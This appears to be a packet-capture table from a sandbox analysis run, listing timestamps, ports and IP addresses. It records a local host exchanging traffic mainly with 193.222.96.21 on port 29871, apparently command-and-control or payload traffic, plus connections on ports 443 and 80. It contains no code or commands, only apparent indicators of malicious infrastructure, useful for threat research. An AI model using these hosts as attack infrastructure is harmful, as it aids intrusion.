May 2, 2024 19:01:51.665294886 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.665303946 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.665332079 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.665332079 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.665780067 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:02:01.901173115 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:02.069258928 CEST	29871	49740	193.222.96.21	192.168.2.4
May 2, 2024 19:02:02.069353104 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:02.070800066 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:02.281860113 CEST	29871	49740	193.222.96.21	192.168.2.4
May 2, 2024 19:02:32.592137098 CEST	29871	49740	193.222.96.21	192.168.2.4
May 2, 2024 19:02:32.594523907 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:32.814830065 CEST	29871	49740	193.222.96.21	192.168.2.4
May 2, 2024 19:02:36.698662043 CEST	29871	49740	193.222.96.21	192.168.2.4
May 2, 2024 19:02:36.743520021 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:36.796737909 CEST	49741	80	192.168.2.4	178.237.33.50
May 2, 2024 19:02:36.964812994 CEST	80	49741	178.237.33.50	192.168.2.4
May 2, 2024 19:02:36.964894056 CEST	49741	80	192.168.2.4	178.237.33.50
May 2, 2024 19:02:36.965058088 CEST	49741	80	192.168.2.4	178.237.33.50
May 2, 2024 19:02:37.136698961 CEST	80	49741	178.237.33.50	192.168.2.4
May 2, 2024 19:02:37.136796951 CEST	49741	80	192.168.2.4	178.237.33.50
May 2, 2024 19:02:37.150882006 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:37.375650883 CEST	29871	49740	193.222.96.21	192.168.2.4
May 2, 2024 19:02:38.140213966 CEST	80	49741	178.237.33.50	192.168.2.4
May 2, 2024 19:02:38.140324116 CEST	49741	80	192.168.2.4	178.237.33.50
May 2, 2024 19:02:42.127460957 CEST	29871	49740	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.131560087 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.181020021 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.301774025 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.301903963 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.302316904 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.474365950 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.474390030 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.474402905 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.474456072 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.474513054 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.474555969 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.641213894 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.641241074 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.641261101 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.641293049 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.641386986 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.641401052 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.641412973 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.641423941 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.641426086 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.641439915 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.641449928 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.641483068 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.808227062 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808247089 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808259964 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808271885 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808285952 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.808310986 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.808324099 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808397055 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808427095 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808460951 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.808497906 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808521986 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808546066 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808568001 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.808579922 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.808590889 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808603048 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808624029 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808666945 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808669090 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.808679104 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808691025 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.808708906 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.808733940 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.975204945 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975230932 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975243092 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975270033 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.975287914 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975322008 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.975334883 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975346088 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975374937 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.975404978 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975434065 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975467920 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.975516081 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975693941 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975750923 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975756884 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.975812912 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975826025 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975861073 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975877047 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.975891113 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.975899935 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975951910 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975971937 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.975980997 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.976016998 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976056099 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.976067066 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976118088 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976141930 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976150990 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.976186037 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976200104 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976221085 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.976279974 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976291895 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976308107 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.976330042 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976347923 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976361036 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976377964 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.976397038 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976398945 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.976419926 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976449013 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976475000 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:42.976485014 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:42.976521969 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142024994 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142102003 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142116070 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142131090 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142143011 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142168999 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142174959 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142180920 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142200947 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142220974 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142235994 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142251015 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142330885 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142343998 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142354965 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142362118 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142368078 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142385006 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142390966 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142443895 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142474890 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142491102 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142534971 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142563105 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142575979 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142628908 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142652035 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.142659903 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142673969 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.142843962 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143062115 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143093109 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143150091 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143294096 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143318892 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143356085 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143392086 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143424034 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143450022 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143461943 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143475056 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143486977 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143490076 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143500090 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143522978 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143524885 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143552065 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143572092 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143587112 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143618107 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143646002 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143718004 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143744946 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143774986 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143788099 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143800020 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143815041 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143831015 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143845081 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143872023 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.143896103 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.143975973 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144001961 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144026995 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144040108 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144064903 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144078970 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144117117 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144144058 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144180059 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144192934 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144205093 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144217014 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144220114 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144228935 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144232988 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144258976 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144262075 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144273996 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144285917 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144296885 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144301891 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144332886 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144335032 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144367933 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144380093 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144393921 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144428015 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144457102 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144485950 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144488096 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144524097 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.144548893 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.144578934 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.147608042 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.326776981 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.326797009 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.326808929 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.326821089 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.326837063 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.326862097 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.326874018 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.326925993 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.326955080 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.326992989 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327004910 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327033997 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327066898 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327100039 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327124119 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327136040 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327171087 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327198029 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327219009 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327280998 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327308893 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327316046 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327374935 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327387094 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327403069 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327424049 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327467918 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327495098 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327514887 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327558994 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327585936 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327588081 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327625990 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327637911 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327651024 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327661991 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327691078 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327759027 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327773094 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327800035 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327807903 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327820063 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327846050 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327867031 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327891111 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327919960 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327946901 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.327971935 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.327991962 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328007936 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328035116 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328047991 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328083992 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328110933 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328135014 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328196049 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328207970 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328222990 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328222990 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328234911 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328247070 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328253984 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328268051 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328275919 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328327894 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328340054 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328356028 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328377008 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328397989 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328409910 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328422070 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328427076 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328452110 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328453064 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328474998 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328502893 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328514099 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328551054 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328578949 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328587055 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328624010 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328635931 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328650951 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328665972 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328676939 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328689098 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328708887 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328713894 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328768015 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328808069 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328830004 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328840971 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328854084 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328865051 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328866959 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328916073 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328927040 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328933954 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328938961 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328959942 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328963041 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.328989029 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.328999043 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329050064 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329078913 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329099894 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329143047 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329154968 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329181910 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329185009 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329197884 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329209089 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329221010 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329236984 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329277992 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329289913 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329358101 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329365015 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329365015 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329370975 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329384089 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329411030 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329422951 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329447031 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329452038 CEST	49742	29871	192.168.2.4	193.222.96.21
